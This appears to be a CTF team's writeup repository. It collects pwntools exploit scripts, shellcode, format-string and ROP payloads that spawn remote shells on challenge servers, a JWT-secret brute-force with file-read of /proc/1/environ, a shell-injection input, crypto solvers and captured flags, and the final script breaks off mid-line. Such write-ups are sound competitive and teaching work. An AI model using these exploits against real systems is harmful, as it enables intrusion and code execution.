-------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/brain_heck/brain-heck.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/brain_heck/brain-heck.zip -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/matrix_preloaded/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import struct 3 | 4 | REMOTE_IP = "158.178.197.18" 5 | REMOTE_PORT = 39909 6 | 7 | p = remote(REMOTE_IP, REMOTE_PORT) 8 | 9 | with open("./shellcode", "rb") as f: 10 | shellcode = f.read() 11 | 12 | p.send(struct.pack('!H', len(shellcode))) 13 | 14 | p.sendline(shellcode) 15 | 16 | p.clean() 17 | 18 | p.interactive() 19 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/matrix_preloaded/matrix-preloaded.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/matrix_preloaded/matrix-preloaded.zip -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/matrix_preloaded/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/matrix_preloaded/shellcode -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/matrix_preloaded/shellcode.asm: -------------------------------------------------------------------------------- 1 | ; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode 2 | 3 | section .text 4 | global _start 5 | 6 | _start: 7 | 
push rax 8 | xor rdx, rdx 9 | mov rbx, 0x68732f2f6e69622f 10 | push rbx 11 | push rsp 12 | pop rdi 13 | mov al, 59 14 | syscall 15 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/write_only/go.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | REMOTE_IP = "147.78.1.47" 4 | REMOTE_PORT = 40183 5 | 6 | p = remote(REMOTE_IP, REMOTE_PORT) 7 | 8 | # mov rdi, 1 9 | # mov rsi, [rbp-0x30] ; flag_mem 10 | # mov rdx, 0x48 11 | # mov rax, 1 12 | # syscall ; write(stdout, flag_mem, 0x48) 13 | shellcode = b"\xbf\x01\x00\00\x00\x48\x8b\x75\xd0\xba\x48\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05" 14 | 15 | p.sendline(shellcode) 16 | 17 | p.interactive() 18 | -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/write_only/write-only.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_03_15_1753CTF/pwn/write_only/write-only.zip -------------------------------------------------------------------------------- /2024_03_15_1753CTF/pwn/write_only/write_only.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2234/ 2 | 3 | # Write Only ~ PWN 4 | 5 | The flag is there. But that doesn’t mean you’ll be able to see it. 6 | 7 | nc 147.78.1.47 40183 8 | 9 | https://dl.1753ctf.com/write-only?s=Fw72X6AX 10 | 11 | ## Solution 12 | 13 | The solution is shellcode that uses only the `write` syscall: it writes 0x48 bytes to stdout from the flag buffer, whose pointer it loads from `[rbp-0x30]`.
14 | 15 | ``` 16 | from pwn import * 17 | 18 | REMOTE_IP = "147.78.1.47" 19 | REMOTE_PORT = 40183 20 | 21 | p = remote(REMOTE_IP, REMOTE_PORT) 22 | 23 | # mov rdi, 1 24 | # mov rsi, [rbp-0x30] ; flag_mem 25 | # mov rdx, 0x48 26 | # mov rax, 1 27 | # syscall ; write(stdout, flag_mem, 0x48) 28 | shellcode = b"\xbf\x01\x00\00\x00\x48\x8b\x75\xd0\xba\x48\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05" 29 | 30 | p.sendline(shellcode) 31 | 32 | p.interactive() 33 | ``` 34 | 35 | ## Flag 36 | `1753c{yes_its_write_only_but_you_can_read_it_too}` 37 | -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/README.md: -------------------------------------------------------------------------------- 1 | # TAMUCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2238 4 | 5 | 74th place 2202 points 6 | -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/cry/criminal/criminal.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/cry/criminal/criminal.zip -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/pwn/admin_panel/admin-panel.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/pwn/admin_panel/admin-panel.zip -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/pwn/super_lucky/super-lucky.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/pwn/super_lucky/super-lucky.zip -------------------------------------------------------------------------------- 
/2024_04_07_TamuCTF24/rev/pwndbg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/rev/pwndbg.png -------------------------------------------------------------------------------- /2024_04_07_TamuCTF24/rev/resistant.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_04_07_TamuCTF24/rev/resistant.zip -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/README.md: -------------------------------------------------------------------------------- 1 | # BYUCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2252 4 | 5 | 29th place 6717 points 6 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/cry/are_s_a/cne.txt: -------------------------------------------------------------------------------- 1 | n = 128393532851463575343089974408848099857979358442919384244000744053339479654557691794114605827105884545240515605112453686433508264824840575897640756564360373615937755743038201363814617682765101064651503434978938431452409293245855062934837618374997956788830791719002612108253528457601645424542240025303582528541 2 | e = 65537 3 | c = 93825584976187667358623690800406736193433562907249950376378278056949067505651948206582798483662803340120930066298960547657544217987827103350739742039606274017391266985269135268995550801742990600381727708443998391878164259416326775952210229572031793998878110937636005712923166229535455282012242471666332812788 4 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/cry/times/times.txt: -------------------------------------------------------------------------------- 1 | Curve: y^2 = x**3 + 13x + 245 % 
335135809459196851603485825030548860907 2 | Point: (14592775108451646097, 237729200841118959448447480561827799984) 3 | {'ciphertext': b'SllGMo5gxalFG9g8j4KO0cIbXeub0CM2VAWzXo3nbIxMqy1Hl4f+dGwhM9sm793NikYA0EjxvFyRMcU2tKj54Q==', 'iv': b'MWkMvRmhFy2vAO9Be9Depw=='} 4 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/fore/Stardust_Whispers/Stardust_Whispers.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/fore/Stardust_Whispers/Stardust_Whispers.docx -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/fore/Stardust_Whispers/fun.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/fore/Stardust_Whispers/fun.pcapng -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/all/all.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/pwn/all/all.zip -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/all/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | LOCAL_BINARY = "./src/all" 6 | REMOTE_IP = "all.chal.cyberjousting.com" 7 | REMOTE_PORT = 1348 8 | 9 | #context.log_level = "debug" 10 | elf = ELF(LOCAL_BINARY, checksec=False) 11 | context.binary = elf 12 | 13 | # 67d9e00d38d59674367ca4591666c67e5dfad9e4fdd3861a59d6f26ffea87f65 ./libc.so 14 | # copied from the containerr with $ docker cp id:/lib/x86_64-linux-gnu/libc.so.6 ./libc.so 15 
| libc = ELF("./libc.so") 16 | 17 | READ_PLUS_0x17 = 0x1147e2 18 | 19 | #p = elf.process() 20 | #p = elf.debug(gdbscript="b vuln") 21 | p = remote(REMOTE_IP, REMOTE_PORT) 22 | 23 | p.sendline(b"%3$p") 24 | 25 | leak = int(p.readline().decode(), 16) 26 | 27 | libc.address = leak - READ_PLUS_0x17 28 | 29 | log.success(f"libc: 0x{libc.address:x}") 30 | 31 | payload = fmtstr_payload(6, {elf.got["printf"]: libc.sym["system"]}) 32 | 33 | p.sendline(payload) 34 | 35 | p.sendline(b"/bin/sh") 36 | 37 | p.clean() 38 | 39 | p.interactive() 40 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/numbersss/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:23.04 2 | 3 | # update 4 | RUN apt-get update 5 | RUN apt-get upgrade -y 6 | RUN apt-get install -y xinetd 7 | RUN rm -rf /var/lib/apt/lists/* 8 | 9 | # set up user 10 | RUN mkdir /ctf 11 | RUN useradd -M -d /ctf ctf 12 | 13 | # import files 14 | RUN echo "Connection blocked" > /etc/banner_fail 15 | #COPY ctf.xinetd /etc/xinetd.d/ctf 16 | COPY . 
/ctf/ 17 | 18 | # set permissions 19 | RUN chown -R root:ctf /ctf 20 | RUN chmod -R 750 /ctf 21 | 22 | # start 23 | CMD ["/usr/sbin/xinetd", "-dontfork"] 24 | EXPOSE 40000 -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/numbersss/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | LOCAL_BINARY = "./numbersss" 6 | REMOTE_IP = "numbersss.chal.cyberjousting.com" 7 | REMOTE_PORT = 1351 8 | 9 | elf = ELF(LOCAL_BINARY, checksec=False) 10 | libc = ELF("./remote.libc.so", checksec=False) 11 | context.binary = elf 12 | 13 | p = remote(REMOTE_IP, REMOTE_PORT) 14 | 15 | p.readuntil(b"Free junk: ") 16 | 17 | leak = int(p.readline().decode(), 16) 18 | 19 | libc.address = leak - libc.sym["printf"] 20 | 21 | log.success(f"libc: 0x{libc.address:x}") 22 | 23 | p.readline() 24 | 25 | p.sendline(b"128") 26 | 27 | POP_RDI = 0x240e5 28 | RET = 0x401016 29 | 30 | payload = b"A" * 0x18 31 | payload += p64(libc.address + POP_RDI) 32 | payload += p64(next(libc.search(b"/bin/sh\x00"))) 33 | payload += p64(RET) 34 | payload += p64(libc.sym["system"]) 35 | payload = payload.ljust(128, b"B") 36 | 37 | p.send(payload) 38 | 39 | p.interactive() 40 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/numbersss/numbersss: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/pwn/numbersss/numbersss -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/pwn/static/static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/pwn/static/static 
-------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/web/not-a-problem/not-a-problem.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/web/not-a-problem/not-a-problem.zip -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/web/random/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2252/ 2 | 3 | # Random (Web) 4 | 5 | DESCRIPTION 6 | I've only had the time to make the API, but it should be working properly. Please make sure it's secure. If you can read any file you want, I'll make sure to reward you! 7 | 8 | ## Solution 9 | The challenge is a Flask server that uses `round(time.time())` as its seed. 10 | So if we can recover that value we can sign our own JWTs. The root issue is a signing secret derived from a guessable timestamp rather than from a CSPRNG. The error response also leaks how long the server has been up, which gives us the time it was started: 11 | ```python 12 | except: 13 | abort(Response(f'

NOT AUTHORIZED






This system has been up for {round(time.time()-time_started)} seconds fyi :wink:', status=403)) 14 | ``` 15 | 16 | So we bruteforce the seed with something like this: 17 | ```python 18 | start = get_start() 19 | time_now = rounded(time.time()) 20 | SECRET = hashlib.sha256(str(time_now - start+100-i).encode()).hexdigest() 21 | ``` 22 | 23 | After we have the secret we can get a file read from `/api/file?filename=` 24 | The flag is in a random directory though, so we just read `/proc/1/environ` and get the dir 25 | Then just `/api/file?filename=/random_dir/flag.txt` 26 | 27 | ## Flag 28 | `byuctf{expl01t_chains_involve_multiple_exploits_in_a_row}` 29 | 30 | shafou - 18/05/2024 31 | -------------------------------------------------------------------------------- /2024_05_17_BYUCTF24/web/triple-whammy/triple-whammy.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_05_17_BYUCTF24/web/triple-whammy/triple-whammy.zip -------------------------------------------------------------------------------- /2024_06_08_Akasec24/README.md: -------------------------------------------------------------------------------- 1 | # Akasec CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2222 4 | 5 | 132nd place 644 points 6 | -------------------------------------------------------------------------------- /2024_06_08_Akasec24/pwn/bad_trip/bad_trip.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_08_Akasec24/pwn/bad_trip/bad_trip.zip -------------------------------------------------------------------------------- /2024_06_08_Akasec24/pwn/good_trip/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = 
"debug" 6 | elf = ELF("./good_trip", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b exec") 11 | p = remote("172.210.129.230", 1351) 12 | 13 | payload = b"\x90" * 44 # nops to overwrite 14 | payload += asm("mov rsp, 0x404500") # new stack 15 | payload += asm("mov rdx, 7") 16 | payload += asm("mov rsi, 4096") 17 | payload += asm("movabs rdi, 0x1337131000") 18 | payload += asm("mov rax, 0x00401090") 19 | payload += asm("call rax") # mprotect(0x1337131000, 4096, 7) 20 | payload += asm("mov rdx, 100") 21 | payload += asm("mov rsi, 0x1337131000") 22 | payload += asm("mov rdi, 0") 23 | payload += asm("mov rax, 0x00401060") 24 | payload += asm("call rax") # read(0, 0x1337131000, 100) 25 | payload += asm("movabs rax, 0x1337131000") 26 | payload += asm("jmp rax") # jmp 0x1337131000 27 | 28 | p.readuntil(b"code size >> ") 29 | p.sendline(str(len(payload)).encode()) 30 | 31 | p.readuntil(b"code >> ") 32 | p.sendline(payload) 33 | 34 | p.sendline(asm(shellcraft.sh())) 35 | 36 | p.interactive() 37 | -------------------------------------------------------------------------------- /2024_06_08_Akasec24/pwn/good_trip/good_trip.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_08_Akasec24/pwn/good_trip/good_trip.zip -------------------------------------------------------------------------------- /2024_06_08_Akasec24/pwn/warmup/warmup.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_08_Akasec24/pwn/warmup/warmup.zip -------------------------------------------------------------------------------- /2024_06_15_jCTF_Teaser24/README.md: -------------------------------------------------------------------------------- 1 | # jCTF Teaser 2024 Writeups 2 | 3 | 
https://ctftime.org/event/2342 4 | 5 | 106 place 224 points 6 | -------------------------------------------------------------------------------- /2024_06_15_jCTF_Teaser24/pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from datetime import datetime 5 | 6 | def to_seconds(t): 7 | time_obj = datetime.strptime(t, "%H:%M:%S.%f") 8 | total_seconds = time_obj.hour * 3600 + time_obj.minute * 60 + time_obj.second + time_obj.microsecond / 1e6 9 | return total_seconds 10 | 11 | characters = "_cdhjlnstuw}" + string.digits + "CFT{" 12 | flag = "" # justCTF{s1d3ch4nn3ls_4tw_79828} 13 | 14 | while True: 15 | p = process(["ssh", "-l", "ctf", "-p", "1337", "localhost"], stdin=PTY, stdout=PTY, stderr=PTY) 16 | highest_time = 0 17 | best_char = "\x69" 18 | for char in characters: 19 | new_flag = flag + char 20 | p.readuntil(b"password: ") 21 | p.sendline(new_flag.encode()) 22 | p.readline().decode() 23 | start = to_seconds(p.readline()[13:].decode().split("]")[0]) 24 | stop = to_seconds(p.readline()[13:].decode().split("]")[0]) 25 | diff = stop - start 26 | if diff > highest_time: 27 | highest_time = diff 28 | best_char = char 29 | flag += best_char 30 | log.info(flag) 31 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Wani CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2377 4 | 5 | 78 place 2413 points 6 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/beginners_aes/cry-beginners-aes.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/crypto/beginners_aes/cry-beginners-aes.zip 
-------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/beginners_aes/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import hashlib 4 | 5 | from Crypto.Util.Padding import unpad 6 | from Crypto.Cipher import AES 7 | 8 | enc = b'\x16\x97,\xa7\xfb_\xf3\x15.\x87jKRaF&"\xb6\xc4x\xf4.K\xd77j\xe5MLI_y\xd96\xf1$\xc5\xa3\x03\x990Q^\xc0\x17M2\x18' 9 | flag_hash = "6a96111d69e015a07e96dcd141d31e7fc81c4420dbbef75aef5201809093210e" 10 | 11 | def decrypt(key, iv): 12 | cipher = AES.new(key, AES.MODE_CBC, iv) 13 | flag = unpad(cipher.decrypt(enc), 16) 14 | if hashlib.sha256(flag).hexdigest() == flag_hash: 15 | print(flag.decode()) # FLAG{7h3_f1r57_5t3p_t0_Crypt0!!} 16 | 17 | for i in range(0x100): 18 | for j in range(0x100): 19 | key = b'the_enc_key_is_' 20 | iv = b'my_great_iv_is_' 21 | key += i.to_bytes(1, byteorder="big") 22 | iv += j.to_bytes(1, byteorder="big") 23 | try: 24 | decrypt(key, iv) 25 | except: 26 | pass 27 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/beginners_rsa/cry-beginners-rsa.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/crypto/beginners_rsa/cry-beginners-rsa.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/beginners_rsa/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | n = 317903423385943473062528814030345176720578295695512495346444822768171649361480819163749494400347 4 | e = 65537 5 | enc = 127075137729897107295787718796341877071536678034322988535029776806418266591167534816788125330265 6 | 7 | # n is factored with sage 8 | # sage: n = 
317903423385943473062528814030345176720578295695512495346444822768171649361480819163749494400347 9 | # sage: n.factor() 10 | # 9953162929836910171 * 11771834931016130837 * 12109985960354612149 * 13079524394617385153 * 17129880600534041513 11 | 12 | p = 9953162929836910171 13 | q = 11771834931016130837 14 | r = 12109985960354612149 15 | s = 13079524394617385153 16 | a = 17129880600534041513 17 | 18 | assert((p*q*r*s*a) == n) 19 | 20 | phi = (p-1)*(q-1)*(r-1)*(s-1)*(a-1) 21 | 22 | d = pow(e, -1, phi) 23 | 24 | m = pow(enc, d, n) 25 | 26 | print(m.to_bytes(20, byteorder="big").decode()) # FLAG{S0_3a5y_1254!!} 27 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/dance/cry-dance.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/crypto/dance/cry-dance.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/replacement/cry-replacement.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/crypto/replacement/cry-replacement.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/crypto/replacement/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import string 4 | import hashlib 5 | import re 6 | 7 | lookup_table = {} 8 | 9 | for char in string.printable: 10 | h = hashlib.md5(str(ord(char)).encode()).hexdigest() 11 | lookup_table[int(h, 16)] = char 12 | 13 | with open("./my_diary_11_8_Wednesday.txt", "r") as f: 14 | ciphertext = eval(f.read()) 15 | 16 | flag = "" 17 | for char in ciphertext: 18 | flag += lookup_table[char] 19 | 20 | 
print(re.findall(r'FLAG{.+}', flag)[0]) # FLAG{13epl4cem3nt} 21 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/misc/sh/mis-sh.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/misc/sh/mis-sh.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/misc/sh/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2377 2 | 3 | # sh (misc) 4 | 5 | shellscript without double quotes 6 | 7 | ## Solution 8 | 9 | ```python 10 | from pwn import * 11 | 12 | r = remote("chal-lz56g6.wanictf.org", "7580") 13 | r.sendline(f"0\t|| 1") 14 | r.interactive() 15 | ``` 16 | 17 | - 0 to pass the grep check 18 | - \t to trick printf, not fully sure how it works but i saw in some testcase on busybox 19 | - || 1 to make test always true 20 | 21 | ## Flag 22 | `FLAG{use_she11check_0r_7he_unexpec7ed_h4ppens}` 23 | 24 | shafouz 2024/06/23 25 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/pwn/do_not_rewrite/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chall", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | p = elf.debug(gdbscript="b main") 11 | #p = remote("chal-lz56g6.wanictf.org", 9004) 12 | 13 | p.readuntil(b"hint: show_flag = ") 14 | leak = int(p.readline().decode(), 16) 15 | elf.address = leak - elf.sym["show_flag"] 16 | log.info(f"elf: 0x{elf.address:x}") 17 | 18 | for i in range(3): 19 | p.sendlineafter(b": ", b"A") 20 | p.sendlineafter(b": ", b"1.1") 21 | p.sendlineafter(b": ", b"1.1") 22 | 23 | p.sendlineafter(b": ", 
p64(elf.sym["show_flag"]+0x17)) 24 | p.sendlineafter(b": ", b"abc") 25 | p.sendlineafter(b": ", b"efg") 26 | 27 | p.interactive() 28 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/pwn/do_not_rewrite/pwn-do-not-rewrite.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/pwn/do_not_rewrite/pwn-do-not-rewrite.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/pwn/do_not_rewrite2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | 7 | elf = ELF("./chall", checksec=False) 8 | context.binary = elf 9 | 10 | libc = ELF("./libc.so.6", checksec=False) 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("chal-lz56g6.wanictf.org", 9005) 15 | 16 | p.readuntil(b"hint: printf = ") 17 | leak = int(p.readline().decode(), 16) 18 | libc.address = leak - libc.sym["printf"] 19 | log.info(f"libc: 0x{libc.address:x}") 20 | 21 | for i in range(3): 22 | p.sendlineafter(b": ", b"A") 23 | p.sendlineafter(b": ", b"1.1") 24 | p.sendlineafter(b": ", b"1.1") 25 | 26 | rop = ROP(libc) 27 | rop.rsi = 0 28 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 29 | rop.rax = constants.SYS_execve 30 | rop.raw(rop.find_gadget(['syscall', 'ret'])[0]) 31 | 32 | p.sendlineafter(b": ", rop.chain()) 33 | p.sendlineafter(b": ", b"abc") 34 | p.sendlineafter(b": ", b"efg") 35 | 36 | p.interactive() 37 | 38 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/pwn/do_not_rewrite2/pwn-do-not-rewrite2.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/pwn/do_not_rewrite2/pwn-do-not-rewrite2.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/rev/home/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | elf = ELF("./chal_home", checksec=False) 6 | context.binary = elf 7 | 8 | p = elf.debug(gdbscript= 9 | """ 10 | set context-sections '' 11 | break main 12 | continue 13 | nextret 14 | search -t bytes FLAG{ 15 | """) 16 | 17 | p.interactive() # FLAG{How_did_you_get_here_4VKzTLibQmPaBZY4} 18 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/rev/home/rev-home.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/rev/home/rev-home.zip -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/rev/thread/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from z3 import * 5 | 6 | N = 45 7 | 8 | output = [ 9 | 0xa8, 0x8a, 0xbf, 0xa5, 0x2fd, 0x59, 0xde, 0x24, 10 | 0x65, 0x10f, 0xde, 0x23, 0x15d, 0x42, 0x2c, 0xde, 11 | 0x09, 0x65, 0xde, 0x51, 0xef, 0x13f, 0x24, 0x53, 12 | 0x15d, 0x48, 0x53, 0xde, 0x09, 0x53, 0x14b, 0x24, 13 | 0x65, 0xde, 0x36, 0x53, 0x15d, 0x12, 0x4a, 0x124, 14 | 0x3f, 0x5f, 0x14e, 0xd5, 0x0b 15 | ] 16 | 17 | input = [] 18 | for i in range(N): 19 | input.append(BitVec(f"{i}", 32)) 20 | 21 | s = Solver() 22 | 23 | for i in range(N): 24 | x = input[i] 25 | op = 0 26 | while op < 3: 27 | new_op = (op + i) % 3 28 | if new_op == 0: 29 | x *= 3 30 | if new_op == 1: 31 | x += 5 32 | if new_op == 2: 33 | x ^= 0x7f 34 | 
op = op + 1 35 | s.add(x == output[i]) 36 | 37 | s.check() 38 | model = s.model() 39 | 40 | flag = "" 41 | for i in range(len(output)): 42 | flag += chr(int(str(model[input[i]]))) 43 | 44 | print(flag) 45 | 46 | p = process("./thread") 47 | 48 | p.sendline(flag.encode()) 49 | 50 | print(p.readline().decode()) 51 | -------------------------------------------------------------------------------- /2024_06_21_WaniCTF24/rev/thread/rev-thread.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_06_21_WaniCTF24/rev/thread/rev-thread.zip -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/README.md: -------------------------------------------------------------------------------- 1 | # UIUCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2275 4 | 5 | 190th place 2023 points 6 | -------------------------------------------------------------------------------- /2024_06_29_UIUCTFCTF24/crypto/without_a_trace/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | traces = [] 6 | 7 | for i in range(6): 8 | with remote("without-a-trace.chal.uiuc.tf", 1337, ssl=True) as p: 9 | if i == 1: 10 | p.sendlineafter(b"u1 = ", b"2") 11 | else: 12 | p.sendlineafter(b"u1 = ", b"1") 13 | 14 | if i == 2: 15 | p.sendlineafter(b"u2 = ", b"2") 16 | else: 17 | p.sendlineafter(b"u2 = ", b"1") 18 | 19 | if i == 3: 20 | p.sendlineafter(b"u3 = ", b"2") 21 | else: 22 | p.sendlineafter(b"u3 = ", b"1") 23 | 24 | if i == 4: 25 | p.sendlineafter(b"u4 = ", b"2") 26 | else: 27 | p.sendlineafter(b"u4 = ", b"1") 28 | 29 | if i == 5: 30 | p.sendlineafter(b"u5 = ", b"2") 31 | else: 32 | p.sendlineafter(b"u5 = ", b"1") 33 | 34 | p.readuntil(b"Have fun: ") 35 | trace = int(p.readline().decode()) 36 | 37 | traces.append(trace) 38 | 39 | flag 
